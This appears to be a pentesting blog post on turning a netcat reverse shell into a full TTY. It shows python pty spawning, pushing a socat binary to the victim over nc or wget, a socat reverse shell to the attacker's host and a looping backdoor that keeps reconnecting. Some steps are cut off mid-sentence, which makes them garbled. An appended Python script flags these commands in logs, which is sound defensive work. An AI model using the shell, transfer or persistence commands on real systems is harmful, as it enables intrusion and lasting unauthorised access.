Ended up with a cheap nc shell and want to upgrade to a “real” shell with a proper TTY and navigation?
Say no more <:
1. Upgrading using shell magic
This doesn’t always work - however, if Python is present on the victim’s machine, it’s worth a try.
Use bash on the attacker machine, zsh doesn’t seem to work.
- Get the
- In the shell, execute:
python -c 'import pty; pty.spawn("/bin/sh")'
to allocate a TTY in the
for proper color support.
- Put the shell into background using CTRL+Z.
- Configure the local shell using stty raw -echo.
fg to bring the
reset and press enter.
Now a proper shell should be present which doesn’t close connections upon CTRL+C <:
If this didn’t work, try the next method:
2. Upgrading using socat
socat can be used to create proper shell sessions. For this, a static binary of the tool is required which can be downloaded here.
First, transfer the socat binary to the victim’s machine using
nc -vvlp 1337 < socat to start a server which pushes the binary to the connecting machine.
b) On the victim, execute nc which downloads the file using
nc <IP> <PORT> > /tmp/socat. You may manually stop the download process because it won’t terminate on its own.
cd into the folder containing the binary and execute
python -m SimpleHTTPServer <PORT>.
cd /tmp && wget http://<IP>:<PORT>/socat
to download the file from the attacker’s machine.
After that, it’s time to spawn the shell:
- Create a socat listener on the attacking machine with
socat file:`tty`,raw,echo=0 tcp-listen:4444
- Spawn a proper reverse shell from the nc shell on the victim’s box using:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<IP>:4444
In case the width of the shell is too small, it can be fixed like this:
- Using a new terminal, execute stty -a to display the number of columns and rows normally used on the attacker’s machine.
- In the (socat) shell, use stty rows <num> cols <num> to fix the width.
Create a lazy backdoor shell on the victim’s machine:
while true; do sleep 10; socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<IP>:<PORT>; done &
In case a previous shell breaks, just set up a new listener to be up and running again without the need to run an exploit again. Or use tsh
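Seen from the defending side, the victim-side commands in both methods leave recognizable command lines. The following is an added example, not part of the original post: it flags them in constructed command-log records; the rule names, record format and sample lines are assumptions.

```python
import re

# Hypothetical rule names; each pattern targets a victim-side command from this post.
RULES = {
    "python-pty-spawn": re.compile(r"\bpython[\d.]*\s+-c\s.*\bpty\.spawn\("),
    "socat-pty-exec": re.compile(r"\bsocat\b.*\bexec:.*\bpty\b.*\btcp:"),
    "socat-respawn-loop": re.compile(r"\bwhile\s+true\b.*\bsocat\b.*\bdone\b"),
    "nc-write-to-tmp": re.compile(r"\bnc\b[^|;&]*>\s*/tmp/"),
}

def classify(cmdline):
    """Return the sorted names of every rule that matches one command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

def scan(records):
    """Parse 'pid<TAB>command' records and return (pid, rules) for each hit."""
    hits = []
    for record in records:
        pid, _, cmdline = record.partition("\t")
        rules = classify(cmdline)
        if rules:
            hits.append((int(pid), rules))
    return hits

# Constructed sample records (192.0.2.x are documentation addresses).
# Redirections and loops only show up in shell-level command logging,
# not in per-process argv, so the last two rules need that kind of source.
SAMPLE = [
    "4101\tpython -c 'import pty; pty.spawn(\"/bin/sh\")'",
    "4102\tnc 192.0.2.10 1337 > /tmp/socat",
    "4103\tsocat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.0.2.10:4444",
    "4104\twhile true; do sleep 10; socat exec:'bash -li',pty,stderr,setsid,sigint,sane "
    "tcp:192.0.2.10:4444; done &",
    "4105\tsocat tcp-listen:8080,fork tcp:192.0.2.20:80",  # benign port forward
    "4106\tpython -c 'print(1)'",                           # benign one-liner
]

if __name__ == "__main__":
    for pid, rules in scan(SAMPLE):
        print(pid, ", ".join(rules))
```

The benign socat port forward and the plain python one-liner stay unflagged because the rules key on the exec/pty combination and on pty.spawn rather than on the tool name alone.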